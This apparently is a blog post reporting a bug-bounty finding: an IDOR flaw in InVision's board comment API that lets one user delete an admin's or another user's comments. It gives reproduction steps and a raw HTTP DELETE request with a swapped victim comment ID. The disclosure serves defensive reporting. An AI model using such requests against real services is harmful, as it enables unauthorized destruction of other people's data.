Hello
CRITICAL : Delete Boards Admin's ( or any other user ) comment. ( IDOR )
I found an IDOR vulnerability from which i can delete board Admin's comment or any other user's comment.
Steps to Reproduce : "A" Admin & "B" Attacker
1- Sign in from 2 different accounts ( A & B ) in 2 different browsers ( or use incognito as 2nd browser )
2- Now go to "A" account and create a board and add anything in it.
3- Comment from both "A" & "B" account.
4- Note down comment id of vitim's comment ( Means ID of "A" )
5- Now go to "B" account, and capture the request while deleting comment of "B" account and change comment id (of "A" account) in URL ( Example : api/board/item/comment/*COMMENT ID* )
In "B" account u do not have option to delete comment of admin which is "A"
6- Status will be "200 OK" and comment should be deleted of another account
HTTP Request Example
DELETE /api/board/item/comment/*VICTIM COMMENT ID* HTTP/1.1
Host: projects.invisionapp.com
Connection: keep-alive
X-Timezone-Offset: -420
Origin: https://projects.invisionapp.com
X-XSRF-TOKEN: dTK57p6DW5mteX-nBBanCmeza0RUvUaI1JksYSQF0cU
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36
X-Referrer-Hash: #/boards/2636413/80399396
Accept: application/json, text/plain, /
X-Page-Loaded-At: 1459747535276
Referer: https://projects.invisionapp.com/d/main
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: ** Cookies Goes Here **
Attached an Video PoC for further explanation and demonstration of the attack.
Thanks
No comments:
Post a Comment